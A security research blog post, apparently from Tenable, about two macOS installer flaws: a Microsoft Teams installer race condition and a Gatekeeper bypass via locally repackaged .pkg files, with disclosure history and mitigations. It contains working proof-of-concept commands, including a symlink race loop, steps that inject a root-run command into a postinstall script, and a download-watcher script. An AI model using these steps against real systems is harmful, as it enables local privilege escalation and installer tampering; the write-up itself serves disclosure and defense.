Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process, which will be run as a Launch Daemon, and thus give the attacker root permissions. This is possible because while the installation scripts do indeed change the write permissions on this file to root-only, creating this directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/"
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won’t spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload "/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon";
done
# Run installer. Wait for the TeamUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry or using the preinstall script to verify permissions on the /Applications/Microsoft Teams directory.
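A defensive preinstall along those lines doesn’t need to be elaborate. The following is a minimal sketch assuming this specific Teams install path (the general pattern applies to any product): it refuses to proceed if the target directory already exists and isn’t owned by root.

#!/bin/sh
# preinstall -- abort the elevated install if the target tree looks attacker-controlled.
TARGET="/Applications/Microsoft Teams.app"
if [ -e "$TARGET" ]; then
    OWNER=$(stat -f '%u' "$TARGET")   # BSD/macOS stat syntax; prints the owning uid
    if [ "$OWNER" != "0" ]; then
        echo "Refusing to install: $TARGET exists and is not owned by root." >&2
        exit 1
    fi
fi
exit 0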

The Microsoft Teams vulnerability triage team has drawn criticism over its handling of vulnerability disclosures these last couple of years. We’d hoped that their recent inclusion in Pwn2Own signaled vast improvements in this area, but unfortunately, their communications in this disclosure, as well as in other disclosures we’ve recently made regarding their products, demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020–9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package and modify it, however, we can modify contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) and could allow malware or some other malicious actor to achieve privilege escalation to root. Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil --expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
echo "#!/usr/bin/env sh\nid > ~/Downloads/exploit\n$(cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak)" > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept
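As mentioned earlier, none of this requires manual effort. A crude sketch of the monitoring half is shown below; polling is inelegant but avoids third-party dependencies, and the tampering step itself would simply be the pkgutil commands above wrapped in a function (the tamper_with name here is hypothetical).

#!/bin/sh
# Crude watcher: poll ~/Downloads for new .pkg files and hand them off for tampering.
SEEN="/tmp/.seen_pkgs"
touch "$SEEN"
while true; do
    for PKG in "$HOME"/Downloads/*.pkg; do
        [ -e "$PKG" ] || continue
        if ! grep -qxF "$PKG" "$SEEN"; then
            echo "$PKG" >> "$SEEN"
            echo "New package spotted: $PKG"
            # tamper_with "$PKG"   # hypothetical function wrapping the steps above
        fi
    done
    sleep 5
done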

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the publicly available Gatekeeper documentation.

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are neither checked for malicious content by Gatekeeper nor required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. An attacker with local access can therefore man-in-the-middle package downloads and escalate to root whenever the tampered package is executed with elevated privileges.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox. It should be noted, though, that similar installer-based attack vectors are actively being exploited, as seen in the recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure process, overusing canned messaging, or simply giving incorrect reasons for rejection should not be the norm, and it highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, communications from the vendors should have been better about what information was needed to clarify the issues before they were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper righthand corner of the installer) goes a long way.
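For the spot-check crowd, the same checks the installer UI performs can also be run from the command line. Both tools below ship with macOS; the package path is just an example based on the Teams installer used earlier.

# Verify the package's signature and the identity of the signer.
pkgutil --check-signature ~/Downloads/Teams_osx.pkg
# Ask Gatekeeper directly whether it would allow this installer package.
spctl --assess --type install -vv ~/Downloads/Teams_osx.pkg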

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.

Further details on these discoveries can be found in TRA-2021–19, TRA-2021–20, and TRA-2021–21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
